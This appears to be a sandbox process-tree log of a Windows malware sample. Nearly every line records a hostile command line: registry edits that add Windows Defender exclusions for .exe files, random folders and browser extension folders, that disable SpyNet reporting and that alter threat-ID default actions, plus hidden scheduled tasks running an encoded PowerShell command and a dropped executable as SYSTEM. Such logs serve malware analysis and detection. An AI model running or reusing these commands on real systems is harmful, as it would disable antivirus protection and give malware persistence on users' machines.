C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:224
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:5772
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5968
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:4924
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:3452
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2440
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5884
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:1460
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBsBRFkNk" /SC once /ST 10:33:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBsBRFkNk"6⤵PID:4024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBsBRFkNk"6⤵PID:3472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exe\" id /JDsite_idDPR 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:5724
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4988 -ip 49881⤵PID:3472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1672 -ip 16721⤵PID:1720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4812 -ip 48121⤵PID:5620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4812 -ip 48121⤵PID:5776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 820 -ip 8201⤵PID:5484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5612
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:6032
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\JTzAdqm.exe id /JDsite_idDPR 385118 /S1⤵PID:1296
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:6104
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5064
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1112
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2984
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:1604
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:3740
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:184
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:2172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:5276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:5180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:5884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:3976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:2956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:3760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:6004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:5684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:6008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:6024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:5448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:5832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:5692
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggLAFgWrk" /SC once /ST 09:08:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggLAFgWrk"2⤵PID:2228
-
-
